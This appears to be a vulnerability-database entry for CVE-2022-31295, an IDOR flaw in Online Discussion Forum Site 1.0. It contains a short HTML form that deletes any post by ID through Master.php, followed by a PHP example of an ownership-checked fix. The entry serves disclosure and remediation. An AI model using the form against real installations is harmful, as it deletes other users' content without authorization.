Related vulnerability
Description
Online Discussion Forum Site 1.0 - IDOR / Delete any post
Introduction
# CVE-2022-31295
#### Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post
#### Date: 2022-06-13
#### CVE: CVE-2022-31295
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu
-----
[#] Vulnerability Location:
`function delete_post()` in `/odfs/classes/Master.php:133`
----
[#] Exploitation:
```
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">
<input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
<button type="submit">Delete Post</button>
</form>
```
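
An IDOR like this one is closed on the server by tying the delete to the authenticated session user instead of trusting the posted `id` alone. The sketch below is an added example, not the ODFS source or a vendor patch: the `post_list` table, its `user_id` column, the `$isAdmin` flag and the function signature are assumptions, and it uses PDO with an in-memory SQLite database and constructed rows so it runs offline.

```php
<?php
declare(strict_types=1);

// Hardened delete (hypothetical signature): a row is removed only if it belongs to the caller.
// $userId must come from the server-side session, never from the request.
function delete_post(PDO $db, ?int $userId, $rawId, bool $isAdmin = false): array
{
    if ($userId === null) {
        return ['status' => 'failed', 'code' => 401];   // no authenticated session
    }
    $postId = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($postId === false) {
        return ['status' => 'failed', 'code' => 400];   // id is not a positive integer
    }
    // Ownership is part of the WHERE clause, so there is no check-then-delete gap.
    $sql = $isAdmin
        ? 'DELETE FROM post_list WHERE id = :id'
        : 'DELETE FROM post_list WHERE id = :id AND user_id = :uid';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':id', $postId, PDO::PARAM_INT);
    if (!$isAdmin) {
        $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    }
    $stmt->execute();
    // Same answer for "not yours" and "does not exist", so the reply is not an ownership oracle.
    return $stmt->rowCount() === 1
        ? ['status' => 'success', 'code' => 200]
        : ['status' => 'failed', 'code' => 404];
}

// Constructed demo data; table and column names are assumptions, not the ODFS schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE post_list (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL, title TEXT)');
$db->exec("INSERT INTO post_list VALUES (1, 10, 'alice post'), (2, 20, 'bob post')");

// In a web handler the arguments would be read like this (session key is hypothetical):
//   $userId = $_SESSION['user_id'] ?? null;  $rawId = $_POST['id'] ?? null;
var_dump(delete_post($db, null, '2'));   // request without a session
var_dump(delete_post($db, 10, '2'));     // user 10 names a post owned by user 20
var_dump(delete_post($db, 20, '2'));     // owner deletes own post
var_dump(delete_post($db, 10, 'abc'));   // malformed id
```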
File snapshot
[4.0K] /data/pocs/6911230fadbe8bab46bd6b00996a340237fa8d79
├── [ 300] deletePost.html
└── [ 862] README.md
0 directories, 2 files